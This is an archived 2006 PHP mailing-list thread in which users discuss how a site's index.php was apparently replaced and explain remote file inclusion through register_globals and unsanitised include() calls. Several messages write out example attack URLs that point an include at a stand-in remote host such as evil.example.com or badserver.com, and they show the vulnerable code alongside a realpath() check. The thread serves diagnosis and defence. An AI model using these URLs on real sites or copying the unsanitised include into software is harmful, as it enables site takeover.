subject:"Re\: \[PHP\] Highjack\?"

RE: [PHP] Highjack?

2006-11-15 Thread bruce


hi chris...

for the initial post, it does/did matter for register_globals to be on/off.

in your reply, you use a $_GET[..] for the $path var. in the initial post
that i saw, (which i replied to), the $path var was simply used, without the
$_GET[..]. it's my understanding (recollection) that if the register_globals
is on, then php will automatically generate and fill vars based on the query
var. whereas, if the register_globals is off, the app has to specifically
'assign' the var via the $GET/$POST...

feel free to correct if something was/is missed. other than that, what you
have stated is completely correct as i understand php to work.



-Original Message-
From: Chris [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 6:28 PM
To: [EMAIL PROTECTED]
Cc: 'PHP'
Subject: Re: [PHP] Highjack?


bruce wrote:
 rory..

 thanks.. i had meant to say assuming globals is off...

Doesn't matter about register globals, it depends on you sanitizing
content as it comes in.

If you have:

http://www.foo...?path=/scripts

and that's plainly visible, then if I do:

http://www.foo?path=http://www.foo1../evil.txt

and you don't check the $path variable:

?php
$path = $_GET['path'];
include($path.'script.php');
?

then bad things happen.

This method relies on allow_url_fopen being on (and in php5.2.0+
allow_url_include I think it's called being on).


On the other hand if you did:

?php
$mydir = dirname(__FILE__);
$path = $_GET['path'];
$fullpath = $mydir . '/' . $path;
if ($fullpath != realpath($fullpath)) {
   echo Hack attempt;
   exit;
}
...

then that's a check to make sure that the path is on the server and that
it doesn't contain '.././' type elements - because then $fullpath will
not be the same as the realpath.


--
Postgresql  php tutorials
http://www.designmagick.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Highjack?

2006-11-15 Thread Chris


bruce wrote:

hi chris...

for the initial post, it does/did matter for register_globals to be on/off.

in your reply, you use a $_GET[..] for the $path var. in the initial post
that i saw, (which i replied to), the $path var was simply used, without the
$_GET[..]. it's my understanding (recollection) that if the register_globals
is on, then php will automatically generate and fill vars based on the query
var. whereas, if the register_globals is off, the app has to specifically
'assign' the var via the $GET/$POST...

feel free to correct if something was/is missed. other than that, what you
have stated is completely correct as i understand php to work.


Fair enough. My point was it's not *just* a register-globals problem, 
rather it can also be a simple trusting issue (ie you're trusting the 
user data rather than checking it).


--
Postgresql  php tutorials
http://www.designmagick.com/

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Highjack?

2006-11-14 Thread tedd


At 12:38 PM -0500 11/13/06, Eric Butera wrote:

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.



I don't have a shopping cart script on the site.

However, register_globals are ON, but I turn them off in my scripts.



If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.


I  just looked at my logs and they only go back one day -- interesting.

tedd
--
---
http://sperling.com  http://ancientstones.com  http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Highjack?

2006-11-14 Thread Andrei


I usualy use an array with site configuration which I define at top
included file so you cannot overwrite the configuration paths from
outside the scripts.

?
  $APP_CFG   = array();
  $APP_CFG[my_path] = /somewhere/on/server/;
?

From TFM:
If URL fopen wrappers are enabled in PHP (which they are in the
default configuration), you can specify the file to be included using a
URL (via HTTP or other supported wrapper - see Appendix M, List of
Supported Protocols/Wrappers for a list of protocols) instead of a local
pathname. If the target server interprets the target file as PHP code,
variables may be passed to the included file using a URL request string
as used with HTTP GET. This is not strictly speaking the same thing as
including the file and having it inherit the parent file's variable
scope; the script is actually being run on the remote server and the
result is then being included into the local script.

Warning:
Windows versions of PHP prior to PHP 4.3.0 do not support accessing
remote files via this function, even if allow_url_fopen is enabled.

Andy

tedd wrote:
 At 11:57 AM -0800 11/14/06, bruce wrote:
 hi tedd...

 for the following url,
 http://www.example.com/test.php?path=abc?dummy=123

 if the register_globals is on, a malicious user could potentially
 invoke,
 http://www.example.com/badscript.php?path=http://www.badserver.com/badscript

 .txt?dummy=123, which would cause the 'badscript.txt' to be used in the
 original script. now, this in and of itself wouldn't cause a file on the
 http server to be changed. however, if the webapp somehow caused the
 $path
 var to be invoked or to be used in an exec() function, then whatever
 is in
 the 'badscript.txt' file will be run as if the file is on the local
 system.

 at this point, you're pretty much at whim of the malicious user. now,
 the
 chance of this happening is pretty slim, unless you're using some open
 source app that's unsecure, and that a user can reasonably easy find.
 which
 is what has happened to some apps in the past.

 a more potential reason for the index.php files to be changed, is
 that there
 was some security hole, either via apache, and/or the OS for the server.

 hope this helps a little bit more...

 Ohhh, so badscript.php doesn't have to exist and the badscript.txt is
 imported via the url, the script is built using only the
 badscript.txt, and then executed as-is -- clever.

 Off to try that... :-)

 ...

 Nope, that didn't work -- I still don't get it.

 I realize that one can grab stuff from another server, but I still
 don't see how one can do this.

 Sorry, for being so dense.

 tedd

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Highjack?

2006-11-13 Thread Eric Butera


On 11/13/06, tedd [EMAIL PROTECTED] wrote:

Hi gang:

While this is not an obvious php question, it does deal with security
which is a concern.

Just this morning had a couple of my sites highjacked. What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:

http://xn--u2g.com/index1.php

It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?

Thanks,

tedd

--
---
http://sperling.com  http://ancientstones.com  http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Highjack?

2006-11-13 Thread bruce

eric...

you say how embarrasing regaring the $path.'foo' i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?


On 11/13/06, tedd [EMAIL PROTECTED] wrote:
 Hi gang:

 While this is not an obvious php question, it does deal with security
 which is a concern.

 Just this morning had a couple of my sites highjacked. What I found
 was someone had replaced my root level index.php with their own
 index.php. You can see the result at:

 http://xn--u2g.com/index1.php

 It was not a terrible loss nor inconvenience, but I wonder how they
 did it. Any ideas how this was done and suggestions as to how to
 prevent this from happening again?

 Thanks,

 tedd

 --
 ---
 http://sperling.com  http://ancientstones.com  http://earthstones.com

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Highjack?

2006-11-13 Thread Matt Carlson

With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) 
are automatically populated into variables.  With that in mind
www.example.com/index.php?path=remoteexplot.com/ would then yield 
include('remoteexplit.com/foo');  thus including ANY code they wish.

- Original Message 
From: bruce [EMAIL PROTECTED]
To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED]
Cc: PHP General List php-general@lists.php.net
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?

eric...

you say how embarrasing regaring the $path.'foo' i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks

-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?

On 11/13/06, tedd [EMAIL PROTECTED] wrote:
 Hi gang:

 While this is not an obvious php question, it does deal with security
 which is a concern.

 Just this morning had a couple of my sites highjacked. What I found
 was someone had replaced my root level index.php with their own
 index.php. You can see the result at:

 http://xn--u2g.com/index1.php

 It was not a terrible loss nor inconvenience, but I wonder how they
 did it. Any ideas how this was done and suggestions as to how to
 prevent this from happening again?

 Thanks,

 tedd

 --
 ---
 http://sperling.com  http://ancientstones.com  http://earthstones.com

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Highjack?

2006-11-13 Thread bruce

rory..

thanks.. i had meant to say assuming globals is off...

-Original Message-
From: Rory Browne [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 10:12 AM
To: PHP
Subject: Fwd: [PHP] Highjack?

-- Forwarded message --
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]

On 11/13/06, bruce [EMAIL PROTECTED] wrote:

 eric...

 you say how embarrasing regaring the $path.'foo' i'm curious, why/how
 is
 this simple piece of code exploitable. assuming $path is not something
 that
 comes via the url vars (GET/POST/REQUEST)

If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript
.txt?dummy=

The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php

it shouldn't be able to be touched
 by external/client processes... similarly, the 'foo' would be static, and
 couldn't be munged...

 thoughts/explanations...

 thanks

 -Original Message-
 From: Eric Butera [mailto:[EMAIL PROTECTED]
 Sent: Monday, November 13, 2006 9:39 AM
 To: tedd
 Cc: PHP General List
 Subject: Re: [PHP] Highjack?

 On 11/13/06, tedd [EMAIL PROTECTED] wrote:
  Hi gang:

  While this is not an obvious php question, it does deal with security
  which is a concern.

  Just this morning had a couple of my sites highjacked. What I found
  was someone had replaced my root level index.php with their own
  index.php. You can see the result at:

  http://xn--u2g.com/index1.php

  It was not a terrible loss nor inconvenience, but I wonder how they
  did it. Any ideas how this was done and suggestions as to how to
  prevent this from happening again?

  Thanks,

  tedd

  --
  ---
  http://sperling.com   http://ancientstones.com  http://earthstones.com

  --
  PHP General Mailing List (http://www.php.net/)
  To unsubscribe, visit: http://www.php.net/unsub.php

 Tedd,

 I've seen this happen before when someone was able to do a remote code
 execution exploit on an old version of a very popular open source
 shopping cart project.  I'd say the first thing would be to try and
 find any include/require statements that are exploitable.  In the case
 I was dealing with, it was a problem with register_globals on and an
 include that looked a bit like this include($path .'script.php');.
 How embarrassing.

 If you have access to your server logs look for urls such as
 http://example.com/exploited.php?action=http://evil.example.com/inject.txt
 .

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Highjack?

Re: [PHP] Highjack?

Re: [PHP] Highjack?

Re: [PHP] Highjack?

Re: [PHP] Highjack?

RE: [PHP] Highjack?

Re: [PHP] Highjack?

RE: [PHP] Highjack?

8 matches

Site Navigation

Mail list logo

Footer information